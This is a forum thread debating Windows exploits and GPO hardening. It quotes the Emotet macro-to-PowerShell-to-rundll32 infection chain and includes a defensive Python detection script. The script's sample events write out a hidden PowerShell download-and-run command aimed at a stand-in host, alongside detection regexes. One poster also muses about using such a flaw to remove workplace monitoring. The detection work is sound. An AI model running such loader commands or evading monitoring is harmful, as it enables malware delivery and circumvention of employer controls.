Official Windows 10 Thread

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
Ohhh that one's good but anybody noticing a big pattern since 2017? All these big "exploits" and "vulnerabilities" require system level and physical access to the machine.
Edit: This one is probably the biggest one I've seen out of everything else. A company with a poor GPO policy will get screwed by this if the users are smart enough.
 

Joe C

Fully Optimized
Messages
4,499
Location
Great Lakes State
I do not agree fully... Any employee that opens a Word attachment with a malicious macro, or that even clicks on a malicious website, will allow another third party access to a PC. From there they can get account keys and admin privileges. This is how ransomware currently spreads through a business network.
Also.... I have read instances where malicious actors attempt to lure employees with large financial gains too.
 

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
I do not agree fully... Any employee that opens a Word attachment with a malicious macro, or that even clicks on a malicious website, will allow another third party access to a PC. From there they can get account keys and admin privileges. This is how ransomware currently spreads through a business network.
Also.... I have read instances where malicious actors attempt to lure employees with large financial gains too.
Yes, but this requires an exe or bat file to be opened within a cmd prompt. This should be blocked by GPO or caught by AV from a business IT perspective. A company with a poor GPO, well, a smart user that knows how to use this will definitely use it. Either for nefarious purposes or not.
Much like all the other crap vulnerabilities and exploits that were talked about the past 5 years, this requires a level of physical access and aptitude that can simply be blocked without 10-20% of performance reduced by so-called mitigations.

Take for example a lot of blocks put in place by company policy. If GPO allowed such an instance I could use something like this to grant myself admin and remove a lot of monitoring and blocks on a system level. Then change DNS, etc to remove blocks on a network level.
 

Joe C

Fully Optimized
Messages
4,499
Location
Great Lakes State
Read in its entirety here:
https://www.bleepingcomputer.com/ne...t-spam-campaigns-hitting-mailboxes-worldwide/
However, once you click on these buttons, malicious macros will be enabled that launch a PowerShell command to download the Emotet loader DLL from a compromised WordPress site and save it to the C:\ProgramData folder. Once downloaded, the DLL will be launched using C:\Windows\SysWOW64\rundll32.exe, which will copy the DLL to a random folder under %LocalAppData% and then reruns the DLL from that folder.
This is only one of several ways that malicious actors access corporate networks for running ransomware.
If any anti-viruses could catch these things then you would not be seeing so many ransomware attacks affecting so many major corporations.
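The chain quoted above (Office macro launches PowerShell, PowerShell downloads a DLL into C:\ProgramData, rundll32.exe loads it, the DLL is re-launched from a folder under %LocalAppData%) is exactly the kind of sequence an endpoint detection rule can key on, because both staging folders are writable by a standard user and the parent/child process relationships are unusual for legitimate Office use. The Python below is an added example written for this reply, not code from the thread or from the article linked above: it runs a few detection rules over constructed process-creation and file-creation events in a simplified format, then correlates them into a single "chain" verdict. The event field names, the file name abc.dll and the URL example.invalid are assumptions for the example.

```python
"""Detect the macro -> PowerShell -> rundll32 loader chain over constructed events.

Event format (assumed for this example, loosely modelled on Sysmon fields):
  {"type": "process_create", "parent_image": ..., "image": ..., "command_line": ...}
  {"type": "file_create",    "image": <writing process>, "target": <path written>}
"""
import re
from typing import Dict, List

# Office applications whose child processes deserve scrutiny.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script/command hosts a macro typically spawns.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# User-writable staging folders named in the quoted write-up: C:\ProgramData and
# the per-user %LocalAppData% (C:\Users\<name>\AppData\Local).
STAGING_RE = re.compile(r"(?i)c:\\programdata\\|c:\\users\\[^\\]+\\appdata\\local\\")
# Common PowerShell download/decode primitives used by loaders.
CRADLE_RE = re.compile(r"(?i)downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|frombase64string")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: Dict) -> List[str]:
    """Return the names of all rules that fire on a single event."""
    findings: List[str] = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")

    # Rule 1: an Office application spawning a script host (macro execution).
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office_spawns_script_host")
    # Rule 2: PowerShell invoked with a download/decode primitive on its command line.
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmd):
        findings.append("powershell_download_cradle")
    # Rule 3: rundll32 loading a DLL from a user-writable staging folder.
    if image == "rundll32.exe" and STAGING_RE.search(cmd):
        findings.append("rundll32_loads_from_staging_dir")
    # Rule 4: a script host writing a file into a staging folder (the "save" step).
    if event.get("type") == "file_create" and image in SCRIPT_HOSTS and STAGING_RE.search(event.get("target", "")):
        findings.append("script_host_writes_to_staging_dir")
    return findings


def chain_detected(events: List[Dict]) -> bool:
    """True when the macro launch and the rundll32 load are both seen in one batch.

    Correlating the two stages keeps single benign rundll32 or PowerShell
    invocations from raising a chain-level alert on their own.
    """
    seen = {f for ev in events for f in analyze(ev)}
    return "office_spawns_script_host" in seen and "rundll32_loads_from_staging_dir" in seen


# Constructed sample events (not real telemetry) following the quoted description.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"type": "process_create",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": PS,
     "command_line": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                     "'http://example.invalid/wp-content/x.php','C:\\ProgramData\\abc.dll')\""},
    {"type": "file_create", "image": PS, "target": "C:\\ProgramData\\abc.dll"},
    {"type": "process_create", "parent_image": PS,
     "image": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "command_line": "rundll32.exe C:\\ProgramData\\abc.dll,Control_RunDLL"},
    {"type": "process_create", "parent_image": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "image": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "command_line": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Qwerty\\abc.dll,Control_RunDLL"},
    # Two benign events that must not fire: Control Panel via rundll32, and Word printing.
    {"type": "process_create", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "process_create",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\splwow64.exe", "command_line": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, analyze(ev))
    print("chain detected:", chain_detected(EVENTS))
```

Rules 1 and 3 are the high-signal ones; rule 2 alone is noisy in environments where administrators script downloads, which is why the batch-level verdict requires the macro launch and the staged-DLL load together rather than any single rule.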
 

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
That's the thing, a good GPO wouldn't allow that save since it requires admin priv to access User, Windows, ProgramData, Program Files, and Program Files (x86). Kinda like the first thing you linked, which is using an exe to grant system level priv, the exe would be wiped being malicious or blocked from download. Both require system level access or a weak GPO. I'm relatively an amateur when it comes to group policy creation admittedly, and I had my kids' machines locked down under my own domain and AD in my own house. I tried everything I could think of as workarounds to my own setup on their machines and nothing worked. My own DNS policies blocked the rest. I'd hope experienced admins working large networks could muster this, as at Lockheed I couldn't do squat once they ditched Jira and went with a good GPO. Relying totally on systems like Jira means you're only blocking things that require admin, which there definitely are workarounds for. Locking profiles down by group policy and local access is a different ball park. Mind you, I did AD, domain, and DNS at my own house spun up from scratch simply as education to further my career. Only took me a couple hours and pros should be able to do it in their sleep, especially 6 figure salaried pros.

A secondary preventative measure is a good IPS and honeypot. That previous situation was just an experiment for education, but for regular use I use OpenDNS to block what I don't want my kids getting to on top of group based blocks provided by Ubiquiti. I have my kids VLAN operating under a Honeypot and it along with IPS blocks a lot of localized malicious content that finds its way through DNS blocks. Like stupid Robux surveys.
 